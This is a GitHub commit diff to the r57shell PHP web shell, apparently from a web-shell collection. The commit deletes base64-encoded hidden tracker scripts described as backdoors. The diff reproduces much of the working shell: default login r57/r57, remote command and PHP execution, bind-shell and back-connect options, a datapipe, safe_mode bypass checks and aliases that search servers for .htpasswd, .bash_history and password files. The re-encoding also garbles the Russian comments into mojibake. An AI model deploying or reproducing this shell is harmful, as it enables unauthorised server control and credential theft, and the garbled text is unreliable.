Update r57 Shell.php.txt

del backdoors
#19
thanks for @Varbaek
This commit is contained in:
tennc 2016-10-07 16:08:54 +08:00 committed by GitHub
parent 104adac40f
commit e0d39713dd

View file

@ -22,15 +22,15 @@
/* /*
/* /*
/* /*
/* r57shell.php - скрипт на пхп позволяющий вам выполнять шелл команды на сервере через браузер /* r57shell.php - ñêðèïò íà ïõï ïîçâîëÿþùèé âàì âûïîëíÿòü øåëë êîìàíäû íà ñåðâåðå ÷åðåç áðàóçåð
/* Вы можете скачать новую версию на нашем сайте: http://rst.void.ru /* Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://rst.void.ru
/* Версия: 1.22 /* Âåðñèÿ: 1.22
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* (c)oded by 1dt.w0lf /* (c)oded by 1dt.w0lf
/* RST/GHC http://rst.void.ru , http://ghc.ru /* RST/GHC http://rst.void.ru , http://ghc.ru
/******************************************************************************************************/ /******************************************************************************************************/
/* ~~~ Настройки ~~~ */ /* ~~~ Íàñòðîéêè ~~~ */
error_reporting(0); error_reporting(0);
set_magic_quotes_runtime(0); set_magic_quotes_runtime(0);
@set_time_limit(0); @set_time_limit(0);
@ -56,12 +56,12 @@ if (@get_magic_quotes_gpc())
} }
} }
/* ~~~ Аутентификация ~~~ */ /* ~~~ Àóòåíòèôèêàöèÿ ~~~ */
// Логин и пароль для доступа к скрипту // Ëîãèí è ïàðîëü äëÿ äîñòóïà ê ñêðèïòó
// НЕ ЗАБУДЬТЕ СМЕНИТЬ ПЕРЕД РАЗМЕЩЕНИЕМ НА СЕРВЕРЕ!!! // ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅÐÂÅÐÅ!!!
$name="r57"; // логин пользователя $name="r57"; // ëîãèí ïîëüçîâàòåëÿ
$pass="r57"; // пароль пользователя $pass="r57"; // ïàðîëü ïîëüçîâàòåëÿ
if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!=$name || $_SERVER['PHP_AUTH_PW']!=$pass) if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!=$name || $_SERVER['PHP_AUTH_PW']!=$pass)
{ {
@ -69,7 +69,7 @@ if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!=$name || $_S
header("HTTP/1.0 401 Unauthorized"); header("HTTP/1.0 401 Unauthorized");
exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>"); exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
} }
$head = '<!-- Здравствуй Вася --> $head = '<!-- Çäðàâñòâóé Âàñÿ -->
<html> <html>
<head> <head>
<title>r57shell</title> <title>r57shell</title>
@ -250,101 +250,101 @@ if(isset($_GET['mem']))
} }
/* /*
Выбор языка Âûáîð ÿçûêà
$language='ru' - русский $language='ru' - ðóññêèé
$language='eng' - английский $language='eng' - àíãëèéñêèé
*/ */
$language='ru'; $language='ru';
$lang=array( $lang=array(
'ru_text1' =>'Выполненная команда', 'ru_text1' =>'Âûïîëíåííàÿ êîìàíäà',
'ru_text2' =>'Выполнение команд на сервере', 'ru_text2' =>'Âûïîëíåíèå êîìàíä íà ñåðâåðå',
'ru_text3' =>'Выполнить команду', 'ru_text3' =>'Âûïîëíèòü êîìàíäó',
'ru_text4' =>'Рабочая директория', 'ru_text4' =>'Ðàáî÷àÿ äèðåêòîðèÿ',
'ru_text5' =>'Загрузка файлов на сервер', 'ru_text5' =>'Çàãðóçêà ôàéëîâ íà ñåðâåð',
'ru_text6' =>'Локальный файл', 'ru_text6' =>'Ëîêàëüíûé ôàéë',
'ru_text7' =>'Алиасы', 'ru_text7' =>'Àëèàñû',
'ru_text8' =>'Выберите алиас', 'ru_text8' =>'Âûáåðèòå àëèàñ',
'ru_butt1' =>'Выполнить', 'ru_butt1' =>'Âûïîëíèòü',
'ru_butt2' =>'Загрузить', 'ru_butt2' =>'Çàãðóçèòü',
'ru_text9' =>'Открытие порта и привязка его к /bin/bash', 'ru_text9' =>'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash',
'ru_text10'=>'Открыть порт', 'ru_text10'=>'Îòêðûòü ïîðò',
'ru_text11'=>'Пароль для доступа', 'ru_text11'=>'Ïàðîëü äëÿ äîñòóïà',
'ru_butt3' =>'Открыть', 'ru_butt3' =>'Îòêðûòü',
'ru_text12'=>'back-connect', 'ru_text12'=>'back-connect',
'ru_text13'=>'IP-адрес', 'ru_text13'=>'IP-àäðåñ',
'ru_text14'=>'Порт', 'ru_text14'=>'Ïîðò',
'ru_butt4' =>'Выполнить', 'ru_butt4' =>'Âûïîëíèòü',
'ru_text15'=>'Загрузка файлов с удаленного сервера', 'ru_text15'=>'Çàãðóçêà ôàéëîâ ñ óäàëåííîãî ñåðâåðà',
'ru_text16'=>'Использовать', 'ru_text16'=>'Èñïîëüçîâàòü',
'ru_text17'=>'Удаленный файл', 'ru_text17'=>'Óäàëåííûé ôàéë',
'ru_text18'=>'Локальный файл', 'ru_text18'=>'Ëîêàëüíûé ôàéë',
'ru_text19'=>'Exploits', 'ru_text19'=>'Exploits',
'ru_text20'=>'Использовать', 'ru_text20'=>'Èñïîëüçîâàòü',
'ru_text21'=>'Новое имя', 'ru_text21'=>'Íîâîå èìÿ',
'ru_text22'=>'datapipe', 'ru_text22'=>'datapipe',
'ru_text23'=>'Локальный порт', 'ru_text23'=>'Ëîêàëüíûé ïîðò',
'ru_text24'=>'Удаленный хост', 'ru_text24'=>'Óäàëåííûé õîñò',
'ru_text25'=>'Удаленный порт', 'ru_text25'=>'Óäàëåííûé ïîðò',
'ru_text26'=>'Использовать', 'ru_text26'=>'Èñïîëüçîâàòü',
'ru_butt5' =>'Запустить', 'ru_butt5' =>'Çàïóñòèòü',
'ru_text28'=>'Работа в safe_mode', 'ru_text28'=>'Ðàáîòà â safe_mode',
'ru_text29'=>'Доступ запрещен', 'ru_text29'=>'Äîñòóï çàïðåùåí',
'ru_butt6' =>'Сменить', 'ru_butt6' =>'Ñìåíèòü',
'ru_text30'=>'Просмотр файла', 'ru_text30'=>'Ïðîñìîòð ôàéëà',
'ru_butt7' =>'Вывести', 'ru_butt7' =>'Âûâåñòè',
'ru_text31'=>'Файл не найден', 'ru_text31'=>'Ôàéë íå íàéäåí',
'ru_text32'=>'Выполнение PHP кода', 'ru_text32'=>'Âûïîëíåíèå PHP êîäà',
'ru_text33'=>'Проверка возможности обхода ограничений open_basedir через функции cURL', 'ru_text33'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé open_basedir ÷åðåç ôóíêöèè cURL',
'ru_butt8' =>'Проверить', 'ru_butt8' =>'Ïðîâåðèòü',
'ru_text34'=>'Проверка возможности обхода ограничений safe_mode через функцию include', 'ru_text34'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç ôóíêöèþ include',
'ru_text35'=>'Проверка возможности обхода ограничений safe_mode через загрузку файла в mysql', 'ru_text35'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç çàãðóçêó ôàéëà â mysql',
'ru_text36'=>'&nbsp;&nbsp;&nbsp;&nbsp;База', 'ru_text36'=>'&nbsp;&nbsp;&nbsp;&nbsp;Áàçà',
'ru_text37'=>'Логин', 'ru_text37'=>'Ëîãèí',
'ru_text38'=>'Пароль&nbsp;&nbsp;', 'ru_text38'=>'Ïàðîëü&nbsp;&nbsp;',
'ru_text39'=>'Таблица', 'ru_text39'=>'Òàáëèöà',
'ru_text40'=>'Дамп таблицы mysql сервера', 'ru_text40'=>'Äàìï òàáëèöû mysql ñåðâåðà',
'ru_butt9' =>'Дамп', 'ru_butt9' =>'Äàìï',
'ru_text41'=>'Сохранить дамп в файле', 'ru_text41'=>'Ñîõðàíèòü äàìï â ôàéëå',
'ru_text42'=>'Редактирование файла', 'ru_text42'=>'Ðåäàêòèðîâàíèå ôàéëà',
'ru_text43'=>'Редактировать файл', 'ru_text43'=>'Ðåäàêòèðîâàòü ôàéë',
'ru_butt10'=>'Сохранить', 'ru_butt10'=>'Ñîõðàíèòü',
'ru_butt11'=>'Редактировать', 'ru_butt11'=>'Ðåäàêòèðîâàòü',
'ru_text44'=>'Редактирование файла невозможно! Доступ только для чтения!', 'ru_text44'=>'Ðåäàêòèðîâàíèå ôàéëà íåâîçìîæíî! Äîñòóï òîëüêî äëÿ ÷òåíèÿ!',
'ru_text45'=>'Файл сохранен', 'ru_text45'=>'Ôàéë ñîõðàíåí',
'ru_text46'=>'Просмотр phpinfo()', 'ru_text46'=>'Ïðîñìîòð phpinfo()',
'ru_text47'=>'Просмотр настроек php.ini', 'ru_text47'=>'Ïðîñìîòð íàñòðîåê php.ini',
'ru_text48'=>'Удаление временных файлов', 'ru_text48'=>'Óäàëåíèå âðåìåííûõ ôàéëîâ',
'ru_text49'=>'Удаление скрипта с сервера', 'ru_text49'=>'Óäàëåíèå ñêðèïòà ñ ñåðâåðà',
'ru_text50'=>'Информация о процессоре', 'ru_text50'=>'Èíôîðìàöèÿ î ïðîöåññîðå',
'ru_text51'=>'Информация о памяти', 'ru_text51'=>'Èíôîðìàöèÿ î ïàìÿòè',
'ru_text52'=>'Текст для поиска', 'ru_text52'=>'Òåêñò äëÿ ïîèñêà',
'ru_text53'=>'Искать в папке', 'ru_text53'=>'Èñêàòü â ïàïêå',
'ru_text54'=>'Поиск текста в файлах', 'ru_text54'=>'Ïîèñê òåêñòà â ôàéëàõ',
'ru_butt12'=>'Найти', 'ru_butt12'=>'Íàéòè',
'ru_text55'=>'Только в файлах', 'ru_text55'=>'Òîëüêî â ôàéëàõ',
'ru_text56'=>'Ничего не найдено', 'ru_text56'=>'Íè÷åãî íå íàéäåíî',
'ru_text57'=>'Создать/Удалить Файл/Директорию', 'ru_text57'=>'Ñîçäàòü/Óäàëèòü Ôàéë/Äèðåêòîðèþ',
'ru_text58'=>'Имя', 'ru_text58'=>'Èìÿ',
'ru_text59'=>'Файл', 'ru_text59'=>'Ôàéë',
'ru_text60'=>'Директорию', 'ru_text60'=>'Äèðåêòîðèþ',
'ru_butt13'=>'Создать/Удалить', 'ru_butt13'=>'Ñîçäàòü/Óäàëèòü',
'ru_text61'=>'Файл создан', 'ru_text61'=>'Ôàéë ñîçäàí',
'ru_text62'=>'Директория создана', 'ru_text62'=>'Äèðåêòîðèÿ ñîçäàíà',
'ru_text63'=>'Файл удален', 'ru_text63'=>'Ôàéë óäàëåí',
'ru_text64'=>'Директория удалена', 'ru_text64'=>'Äèðåêòîðèÿ óäàëåíà',
'ru_text65'=>'Создать', 'ru_text65'=>'Ñîçäàòü',
'ru_text66'=>'Удалить', 'ru_text66'=>'Óäàëèòü',
'ru_text67'=>'Chown/Chgrp/Chmod', 'ru_text67'=>'Chown/Chgrp/Chmod',
'ru_text68'=>'Команда', 'ru_text68'=>'Êîìàíäà',
'ru_text69'=>'Параметр1', 'ru_text69'=>'Ïàðàìåòð1',
'ru_text70'=>'Параметр2', 'ru_text70'=>'Ïàðàìåòð2',
'ru_text71'=>"Второй параметр команды:\r\n- для CHOWN - имя нового пользователя или его UID (числом) \r\n- для команды CHGRP - имя группы или GID (числом) \r\n- для команды CHMOD - целое число в восьмеричном представлении (например 0777)", 'ru_text71'=>"Âòîðîé ïàðàìåòð êîìàíäû:\r\n- äëÿ CHOWN - èìÿ íîâîãî ïîëüçîâàòåëÿ èëè åãî UID (÷èñëîì) \r\n- äëÿ êîìàíäû CHGRP - èìÿ ãðóïïû èëè GID (÷èñëîì) \r\n- äëÿ êîìàíäû CHMOD - öåëîå ÷èñëî â âîñüìåðè÷íîì ïðåäñòàâëåíèè (íàïðèìåð 0777)",
'ru_text72'=>'Текст для поиска', 'ru_text72'=>'Òåêñò äëÿ ïîèñêà',
'ru_text73'=>'Искать в папке', 'ru_text73'=>'Èñêàòü â ïàïêå',
'ru_text74'=>'Искать в файлах', 'ru_text74'=>'Èñêàòü â ôàéëàõ',
'ru_text75'=>'* можно использовать регулярное выражение', 'ru_text75'=>'* ìîæíî èñïîëüçîâàòü ðåãóëÿðíîå âûðàæåíèå',
'ru_text76'=>'Поиск текста в файлах с помощью утилиты find', 'ru_text76'=>'Ïîèñê òåêñòà â ôàéëàõ ñ ïîìîùüþ óòèëèòû find',
/* --------------------------------------------------------------- */ /* --------------------------------------------------------------- */
'eng_text1' =>'Executed command', 'eng_text1' =>'Executed command',
'eng_text2' =>'Execute command on server', 'eng_text2' =>'Execute command on server',
@ -437,59 +437,59 @@ $lang=array(
); );
/* /*
Алиасы команд Àëèàñû êîìàíä
Позволяют избежать многократного набора одних и тех-же команд. ( Сделано благодаря моей природной лени ) Ïîçâîëÿþò èçáåæàòü ìíîãîêðàòíîãî íàáîðà îäíèõ è òåõ-æå êîìàíä. ( Ñäåëàíî áëàãîäàðÿ ìîåé ïðèðîäíîé ëåíè )
Вы можете сами добавлять или изменять команды. Âû ìîæåòå ñàìè äîáàâëÿòü èëè èçìåíÿòü êîìàíäû.
*/ */
$aliases=array( $aliases=array(
/* поиск на сервере всех файлов с suid битом */ /* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */
'find suid files'=>'find / -type f -perm -04000 -ls', 'find suid files'=>'find / -type f -perm -04000 -ls',
/* поиск в текущей директории всех файлов с suid битом */ /* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ suid áèòîì */
'find suid files in current dir'=>'find . -type f -perm -04000 -ls', 'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
/* поиск на сервере всех файлов с sgid битом */ /* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */
'find sgid files'=>'find / -type f -perm -02000 -ls', 'find sgid files'=>'find / -type f -perm -02000 -ls',
/* поиск в текущей директории всех файлов с sgid битом */ /* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ sgid áèòîì */
'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', 'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
/* поиск на сервере файлов config.inc.php */ /* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */
'find config.inc.php files'=>'find / -type f -name config.inc.php', 'find config.inc.php files'=>'find / -type f -name config.inc.php',
/* поиск в тек дире config.inc.php */ /* ïîèñê â òåê äèðå config.inc.php */
'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', 'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
/* поиск на сервере файлов config* */ /* ïîèñê íà ñåðâåðå ôàéëîâ config* */
'find config* files'=>'find / -type f -name "config*"', 'find config* files'=>'find / -type f -name "config*"',
/* поиск в текущей директории файлов config* */ /* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config* */
'find config* files in current dir'=>'find . -type f -name "config*"', 'find config* files in current dir'=>'find . -type f -name "config*"',
/* поиск на сервере всех файлов доступных на запись для всех */ /* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
'find all writable files'=>'find / -type f -perm -2 -ls', 'find all writable files'=>'find / -type f -perm -2 -ls',
/* поиск в текущей директории всех файлов доступных на запись для всех */ /* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
'find all writable files in current dir'=>'find . -type f -perm -2 -ls', 'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
/* поиск на сервере всех директорий доступных на запись для всех */ /* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
'find all writable directories'=>'find / -type d -perm -2 -ls', 'find all writable directories'=>'find / -type d -perm -2 -ls',
/* поиск в текущей директории всех директорий доступных на запись для всех */ /* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
/* поиск на сервере всех директорий и файлов доступных на запись для всех */ /* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
'find all writable directories and files'=>'find / -perm -2 -ls', 'find all writable directories and files'=>'find / -perm -2 -ls',
/* поиск в текущей директории всех директорий и файлов доступных на запись для всех */ /* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */
'find all writable directories and files in current dir'=>'find . -perm -2 -ls', 'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
/* поиск на сервере файлов service.pwd ... frontpage =))) */ /* ïîèñê íà ñåðâåðå ôàéëîâ service.pwd ... frontpage =))) */
'find all service.pwd files'=>'find / -type f -name service.pwd', 'find all service.pwd files'=>'find / -type f -name service.pwd',
/* поиск в текущей директории файлов service.pwd */ /* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd */
'find service.pwd files in current dir'=>'find . -type f -name service.pwd', 'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
/* поиск на сервере файлов .htpasswd */ /* ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd */
'find all .htpasswd files'=>'find / -type f -name .htpasswd', 'find all .htpasswd files'=>'find / -type f -name .htpasswd',
/* поиск в текущей директории файлов .htpasswd */ /* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd */
'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', 'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
/* поиск всех файлов .bash_history */ /* ïîèñê âñåõ ôàéëîâ .bash_history */
'find all .bash_history files'=>'find / -type f -name .bash_history', 'find all .bash_history files'=>'find / -type f -name .bash_history',
/* поиск в текущей директории файлов .bash_history */ /* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history */
'find .bash_history files in current dir'=>'find . -type f -name .bash_history', 'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
/* поиск всех файлов .fetchmailrc */ /* ïîèñê âñåõ ôàéëîâ .fetchmailrc */
'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', 'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
/* поиск в текущей директории файлов .fetchmailrc */ /* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc */
'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', 'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
/* вывод списка атрибутов файлов на файловой системе ext2fs */ /* âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */
'list file attributes on a Linux second extended file system'=>'lsattr -va', 'list file attributes on a Linux second extended file system'=>'lsattr -va',
/* просмотр открытых портов */ /* ïðîñìîòð îòêðûòûõ ïîðòîâ */
'show opened ports'=>'netstat -an | grep -i listen', 'show opened ports'=>'netstat -an | grep -i listen',
'----------------------------------------------------------------------------------------------------'=>'ls -la' '----------------------------------------------------------------------------------------------------'=>'ls -la'
); );
@ -499,7 +499,7 @@ $table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=
$table_up2 = " ::</div></b></font></td></tr><tr><td>"; $table_up2 = " ::</div></b></font></td></tr><tr><td>";
$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; $table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
$table_end1 = "</td></tr>"; $table_end1 = "</td></tr>";
$arrow = " <font face=Wingdings color=gray>и</font>"; $arrow = " <font face=Wingdings color=gray>è</font>";
$lb = "<font color=black>[</font>"; $lb = "<font color=black>[</font>";
$rb = "<font color=black>]</font>"; $rb = "<font color=black>]</font>";
$font = "<font face=Verdana size=-2>"; $font = "<font face=Verdana size=-2>";
@ -513,10 +513,10 @@ $windows = 0;
$unix = 0; $unix = 0;
if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
if(empty($dir)) if(empty($dir))
{ // на случай если не удалось получить директорию { // íà ñëó÷àé åñëè íå óäàëîñü ïîëó÷èòü äèðåêòîðèþ
$os = getenv('OS'); $os = getenv('OS');
if(empty($os)){ $os = php_uname(); } // пробуем получить через php_uname() if(empty($os)){ $os = php_uname(); } // ïðîáóåì ïîëó÷èòü ÷åðåç php_uname()
if(empty($os)){ $os ="-"; $unix=1; } // если ничего не получилось то будет unix =) if(empty($os)){ $os ="-"; $unix=1; } // åñëè íè÷åãî íå ïîëó÷èëîñü òî áóäåò unix =)
else else
{ {
if(@eregi("^win",$os)) { $windows = 1; } if(@eregi("^win",$os)) { $windows = 1; }
@ -565,9 +565,9 @@ if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd'])
die(); // show founded strings and die die(); // show founded strings and die
} }
/* Проверка того можем ли мы выполнять команды при выключенном safe_mode. Если нет то считаем что сейф включен */ /* Ïðîâåðêà òîãî ìîæåì ëè ìû âûïîëíÿòü êîìàíäû ïðè âûêëþ÷åííîì safe_mode. Åñëè íåò òî ñ÷èòàåì ÷òî ñåéô âêëþ÷åí */
/* Обходит невозможность выполнения команд на винде когда сейф выключен но cmd.exe переименован */ /* Îáõîäèò íåâîçìîæíîñòü âûïîëíåíèÿ êîìàíä íà âèíäå êîãäà ñåéô âûêëþ÷åí íî cmd.exe ïåðåèìåíîâàí */
/* либо когда в php.ini прописаны disable_functions */ /* ëèáî êîãäà â php.ini ïðîïèñàíû disable_functions */
if($windows&&!$safe_mode) if($windows&&!$safe_mode)
{ {
$uname = ex("ver"); $uname = ex("ver");
@ -632,7 +632,7 @@ function ex($cfe)
/* write error */ /* write error */
function we($i) function we($i)
{ {
if($GLOBALS['language']=="ru"){ $text = 'Ошибка! Не могу записать в файл '; } if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó çàïèñàòü â ôàéë '; }
else { $text = "[-] ERROR! Can't write in file "; } else { $text = "[-] ERROR! Can't write in file "; }
echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
} }
@ -640,7 +640,7 @@ echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><fon
/* read error */ /* read error */
function re($i) function re($i)
{ {
if($GLOBALS['language']=="ru"){ $text = 'Ошибка! Не могу прочитать файл '; } if($GLOBALS['language']=="ru"){ $text = 'Îøèáêà! Íå ìîãó ïðî÷èòàòü ôàéë '; }
else { $text = "[-] ERROR! Can't read file "; } else { $text = "[-] ERROR! Can't read file "; }
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
} }
@ -648,7 +648,7 @@ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgco
/* create error */ /* create error */
function ce($i) function ce($i)
{ {
if($GLOBALS['language']=="ru"){ $text = "Не удалось создать "; } if($GLOBALS['language']=="ru"){ $text = "Íå óäàëîñü ñîçäàòü "; }
else { $text = "Can't create "; } else { $text = "Can't create "; }
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
} }
@ -1022,25 +1022,7 @@ DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSU
ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
/* --- END datapipe.pl ----------------------------------------------------------------------------------------- */ /* --- END datapipe.pl ----------------------------------------------------------------------------------------- */
$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
